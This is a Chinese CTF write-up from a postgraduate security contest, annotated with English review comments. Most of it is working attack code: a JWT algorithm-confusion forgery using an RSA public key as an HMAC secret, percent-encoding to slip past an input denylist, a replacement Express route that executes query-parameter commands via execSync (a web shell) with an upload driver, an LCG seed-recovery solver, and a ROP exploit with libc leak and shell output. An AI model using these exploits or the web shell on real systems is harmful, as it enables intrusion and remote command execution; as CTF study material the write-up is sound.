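// Verification key for incoming JWTs: an RSA *public* key, i.e. something
// every client may legitimately hold. It must only ever be used to check
// signatures, never as a shared secret.
var publicKey = fs.readFileSync('./config/public.pem');

// Accept only the asymmetric algorithm the key belongs to. The previous
// list was ["HS256", "RS256"]: with both enabled, a token whose header says
// "HS256" is verified as an HMAC keyed with the public-key bytes, so anyone
// holding the public key can mint a token that passes. Pinning RS256 closes
// that algorithm-confusion hole; the exempt paths are unchanged.
app.use(expressjwt({ secret: publicKey, algorithms: ["RS256"] }).unless({ path: ["/", "/api/login"] }));

// Denylist applied to the JSON form of body, query, req.auth (filled in by
// the JWT middleware above) and headers.
// NOTE(review): the literal on the page arrived without backslashes (other
// snippets on the page lost "\n" and "\x00" the same way); the escaped form
// below is the only syntactically valid reading of it. The /g flag is not
// carried over: a shared /g regex keeps a stateful lastIndex across .test()
// calls, and it adds nothing to a yes/no match.
// Because the test runs on the raw serialised text, values that are only
// decoded later (percent-encoded path segments, for instance) are not
// matched. Treat this as defence in depth: any handler that turns a claim or
// field into a file path must normalise and validate the *decoded* path
// itself instead of relying on this pre-filter.
var BLOCKED_INPUT = /\.\.\/|proc|public|routes|\.js|cron|views/i;
app.use(function(req, res, next) {
  var tainted = [req.body, req.query, req.auth, req.headers].some(function(item) {
    // The earlier version also console.log()ed req.auth once per item here,
    // which wrote the token's claims to the log on every request; dropped.
    if (!item) {
      return false;
    }
    return BLOCKED_INPUT.test(JSON.stringify(item));
  });
  if (tainted) {
    return res.status(403).send('illegal data.');
  }
  next();
});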
# Container entrypoint: short pause, then start the app as the unprivileged
# `ctfer` user under nodemon (which restarts the app when files change).
# The trailing tail -f /dev/null only runs once nodemon exits and keeps the
# container from stopping at that point.
sleep 1
runuser -u ctfer nodemon app.js
/usr/bin/tail -f /dev/null
首先构造一个jwt,使用url编码绕过关键字检测
var jwt = require("jsonwebtoken");
var fs = require("fs");
// Claims of the forged token signed below. Note `payload` is assigned
// without a declaration, so it becomes an implicit global in sloppy mode.
// `home.pathname` is written percent-encoded: the server's denylist regex
// only sees the JSON text, so "routes" and ".js" never appear literally.
// Presumably the upload handler later uses it as a destination path; that
// handler is not shown on this page.
payload = {
  isAdmin: true,
  username: "admin",
  home: { "href": "ank1e", "origin": "ank1e", "protocol": "file:", "hostname": "",
    "pathname": "/app/%72%6f%75%74%65%73/index.%6a%73" }
}
// The server's RSA *public* key -- not a secret by design.
var publicKey = fs.readFileSync('./public.pem');
// Signing with HS256 and the public-key bytes only works because the server
// lists HS256 next to RS256 while passing that same key as `secret`; a
// verifier restricted to RS256 rejects this token outright.
var token = jwt.sign(payload, publicKey, { algorithm: "HS256" });
console.log(token)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJ1c2Vy
bmFtZSI6ImFkbWluIiwiaG9tZSI6eyJocmVmIjoiYW5rMWUiLCJvcmlnaW4iOiJhb
msxZSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIj
oiL2FwcC8lNzIlNmYlNzUlNzQlNjUlNzMvaW5kZXguJTZhJTczIn0sImlhdCI6MTY
2ODMxOTQyOX0.FlEloSS0gf3QdUzkZRUegU0c47whg8SUvitxkOnGySg
var express = require('express');
const execSync = require('child_process').execSync;
var router = express.Router();
/* GET home page. */
// This is the routes/index.js that the upload step below drops into the
// application: the original render call is left commented out and the
// handler instead runs whatever the `cmd` query parameter holds through
// execSync and returns its output. "/" is on the JWT middleware's exempt
// list, so no token is needed to reach it. The defensive fix is not in this
// file but at the upload endpoint: uploads must never be written into a
// directory the app loads code from (nodemon in the entrypoint restarts the
// app as soon as such a file changes).
router.get('/', function(req, res, next) {
  // res.render('index', { title: 'HackThisBox' });
  var cmd = execSync(req.query.cmd);
  res.send(cmd.toString());
});
module.exports = router;
import requests
# Driver for the two-step interaction with the challenge host: upload the
# replacement routes file with the forged token, then request "/" once.
sess = requests.session()
url = 'http://192.168.1.107:18000/'
# Token produced by the node snippet above. NOTE(review): the header value
# was line-wrapped in transcription; it must be the single line
# "Bearer <token>" as reconstructed here.
hearder = {
    "authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJ1c2VybmFtZSI6ImFkbWluIiwiaG9tZSI6eyJocmVmIjoiYW5rMWUiLCJvcmlnaW4iOiJhbmsxZSIsInByb3RvY29sIjoiZmlsZToiLCJob3N0bmFtZSI6IiIsInBhdGhuYW1lIjoiL2FwcC8lNzIlNmYlNzUlNzQlNjUlNzMvaW5kZXguJTZhJTczIn0sImlhdCI6MTY2ODMxOTQyOX0.FlEloSS0gf3QdUzkZRUegU0c47whg8SUvitxkOnGySg"
}
# The local index.js (the router shown above) is sent as the multipart field
# "file". The open() handle is never closed explicitly.
file = {"file":("./index.js",open("./index.js","rb").read())}
res = sess.post("http://192.168.1.107:18000/api/upload",files=file,headers=hearder)
print(res.text)
# After the upload, "/" is served by the replaced handler.
res = sess.get("http://192.168.1.107:18000/",params={"cmd":'/readflag'})
print(res.text)
拿到手是一个有问题的二维码,先补一个标志位,直接扫描
发现得到4个字符457c
binwalk分离一下这个图片,发现分离出来一串字符和一些数据,010打开数据发现是个图片,但是少了8950,补全这个数据得到一个图片。
猜测这4个????是前面得到的457c, 然后看分离出来的一串字符
42064652d3431356135323533646230387d0ec187c229c4d4a44
看着很像是hex,但是转不出来,后来把第一位去掉发现得到flag后半部分
from pwn import *
from Crypto.Util.number import *
# Verbose pwntools logging for the whole session (every send/recv is echoed).
context.update(log_level='debug')
def solve1(a, b, num1, N):
    """Recover the seed from one output when a, b and N are all known.

    Inverts num1 = a*seed + b (mod N): subtract the increment, then multiply
    by the modular inverse of a. inverse() fails if a has no inverse mod N.
    """
    a_inv = inverse(a, N)
    return (a_inv * (num1 - b)) % N
# 差分 num2-num1
def solve2(a, N, num1, num2):
    """Recover the seed when the increment b is unknown.

    Two consecutive outputs reveal it, b = num2 - a*num1 (mod N); the seed is
    then obtained exactly as in solve1.
    """
    b = (num2 - a * num1) % N
    shifted = num1 - b
    return (inverse(a, N) * shifted) % N
# 差分 num3-num2,num2-num1
def solve3(N, num1, num2, num3):
    """Recover the seed from three consecutive outputs when both the
    multiplier a and the increment b are unknown.

    Consecutive differences satisfy num3 - num2 = a*(num2 - num1) (mod N),
    which yields a; b follows from num2 = a*num1 + b, and the seed is solved
    as in solve1. Both num2 - num1 and a must be invertible mod N.
    """
    step = num2 - num1
    a = ((num3 - num2) * inverse(step, N)) % N
    b = num2 - a * num1
    return ((num1 - b) * inverse(a, N)) % N
# 等差数列求N
def solve4(num_list):
    """Recover N and then the seed from six consecutive outputs when a, b
    and N are all unknown.

    The differences of consecutive outputs form a geometric progression
    mod N (each is a times the previous one), so expressions such as
    t1*t3 - t2**2 are multiples of N; the gcd of three of them is taken as N.
    The first three outputs then give a, b and the seed as in solve3.

    num_list needs at least six ints (only the first six are used). If the
    three products share an extra common factor the gcd is a multiple of the
    real N; that case is not detected here.
    """
    diffs = [later - earlier for earlier, later in zip(num_list, num_list[1:])]
    multiples_of_n = [
        diffs[1] * diffs[3] - diffs[2] ** 2,
        diffs[2] * diffs[4] - diffs[3] ** 2,
        diffs[0] * diffs[4] - diffs[1] * diffs[3],
    ]
    N = GCD(GCD(multiples_of_n[0], multiples_of_n[1]), multiples_of_n[2])
    first, second, third = num_list[0], num_list[1], num_list[2]
    a = (inverse(second - first, N) * (third - second)) % N
    b = second - a * first
    return (inverse(a, N) * (first - b)) % N
# Interactive driver: connect to the challenge service, read which variant
# it is presenting, pull the published parameters and answer with the
# recovered seed. Indentation was lost in transcription and is restored here
# in the only reading that keeps the loop meaningful.
num_list = []
r = remote('192.168.1.105',19999)
while True:
    r.recvuntil('This is the')
    challege = r.recvline()
    # print("challenge1" in str(challege))
    if "challenge1" in str(challege):
        # a, b and N are published: a single output suffices (solve1).
        r.recvuntil('a=')
        a = r.recvline()
        r.recvuntil('b=')
        b = r.recvline()
        r.recvuntil('N=')
        N = r.recvline()
        r.recvuntil('num1=')
        num1 = r.recvline()
        # int() accepts the raw bytes line and ignores the trailing newline.
        seed = solve1(int(a),int(b),int(num1),int(N))
    elif 'challenge2' in str(challege):
        # b withheld: two outputs (solve2).
        r.recvuntil('a=')
        a = r.recvline()
        r.recvuntil('N=')
        N = r.recvline()
        r.recvuntil('num1=')
        num1 = r.recvline()
        r.recvuntil('num2=')
        num2 = r.recvline()
        seed = solve2(int(a),int(N),int(num1),int(num2))
    elif 'challenge3' in str(challege):
        # a and b withheld: three outputs (solve3).
        r.recvuntil('N=')
        N = r.recvline()
        r.recvuntil('num1=')
        num1 = r.recvline()
        r.recvuntil('num2=')
        num2 = r.recvline()
        r.recvuntil('num3=')
        num3 = r.recvline()
        seed = solve3(int(N),int(num1),int(num2),int(num3))
    elif 'challenge4' in str(challege):
        # Nothing published: six outputs, N recovered from their differences
        # (solve4). NOTE: num_list is module-level and never cleared, so a
        # repeated challenge4 round would append to the previous six values.
        r.recvuntil('num1=')
        num1 = r.recvline()
        num_list.append(int(num1))
        r.recvuntil('num2=')
        num2 = r.recvline()
        num_list.append(int(num2))
        r.recvuntil('num3=')
        num3 = r.recvline()
        num_list.append(int(num3))
        r.recvuntil('num4=')
        num4 = r.recvline()
        num_list.append(int(num4))
        r.recvuntil('num5=')
        num5 = r.recvline()
        num_list.append(int(num5))
        r.recvuntil('num6=')
        num6 = r.recvline()
        num_list.append(int(num6))
        seed = solve4(num_list)
    # NOTE: if no branch matched, `seed` is stale from the previous round
    # (or unbound on the first one).
    r.sendlineafter("seed =",str(seed))
    # print(seed)
# NOTE(review): with the loop as read here this line is never reached (the
# loop has no break and a closed connection raises EOFError first); it may
# have been meant to sit inside the loop.
r.interactive()
# Run the angr solver inside the official angr image, with the current
# directory (binary plus exp.py) mounted at /ang. The last two commands are
# typed at the shell that `docker run -it` opens inside the container.
docker pull angr/angr
docker run -it -v $(pwd):/ang angr/angr
cd /ang
python exp.py
import angr
# Symbolically explore ./infantvm from its entry point until some state has
# written "Good job" to stdout, discarding states that already wrote
# "Try again"; the winning state's stdin is the input that reaches success.
p = angr.Project('./infantvm')
a = p.factory.entry_state()
sm = p.factory.simulation_manager(a)


def good(a):
    """True once this state's stdout (fd 1) contains the success banner."""
    out = a.posix.dumps(1)
    return out.find(b"Good job") != -1


def bad(a):
    """True once this state's stdout (fd 1) contains the failure banner."""
    out = a.posix.dumps(1)
    return out.find(b"Try again") != -1


sm.explore(find=good, avoid=bad)
if sm.found:
    find_a = sm.found[0]
    # stdin (fd 0) of the successful state is the solving input.
    flag = find_a.posix.dumps(0)
    print(flag)
from pwn import *
#p = process('./stack')
p = remote('192.168.1.103', 19999)
elf = ELF('./stack')
libc = ELF('./libc.so.6')
# Fixed addresses taken from the challenge binary and its bundled libc;
# they are specific to those exact files.
leave_ret = 0x0000000000400718
pop_rdi = 0x00000000004007a3
bss = 0x00000000006010A0
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x000000000040071A
ret = 0x0000000000400509
#gdb.attach(p, "b main")
# NOTE(review): backslash escapes were stripped in transcription. The prompt
# strings below end in "\n", and the ljust fill below is b"\x00" -- ljust
# requires a single-byte fill, so the 'x00' as printed could not have run.
# Round 1: the "name" input holds the chain that prints puts@got and
# returns to main; the "data" input overwrites the saved frame pointer with
# bss and returns through leave;ret.
payload = p64(ret)*0x20 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendafter(b"input your name:n", payload)
payload = b'a'*0x70 + p64(bss) + p64(leave_ret)
p.sendafter(b"input your data:n", payload)
# Six leaked bytes of the puts address, zero-padded to eight; subtracting
# the libc symbol offset gives the libc load base.
leak = u64(p.recv(6).ljust(8, b'x00')) - libc.sym['puts']
log.success(hex(leak))
sys = leak + libc.sym['system']
# Offsets relative to the libc base; `ogg` is the address the second
# pivot returns to.
binsh = leak + 0x000000000018ce57
ogg = leak + 0xf1247
# Round 2 (main was re-entered): same two inputs with the second chain.
payload = p64(ret) + p64(pop_rdi) + p64(binsh) + p64(sys)
p.sendafter(b"input your name:n", payload)
payload = b'a'*0x70 + p64(bss) + p64(ogg)
p.sendafter(b"input your data:n", payload)
p.interactive()
ls /;ls /;
bin
dev
flag.txt
lib
lib32
lib64
stack
usr
bin
dev
flag.txt
lib
lib32
lib64
stack
usr
: not found
cat /flag.txt;cat /flag.txt;
: not
foundc4f67a718f59d93151f38a2804bf5feec4f67a718f59d93151f38sh: 30:
a2804bf5feec4f67a718f59d93151f38
原文始发于微信公众号(EDI安全):“华为杯”第一届中国研究生网络安全创新大赛初赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。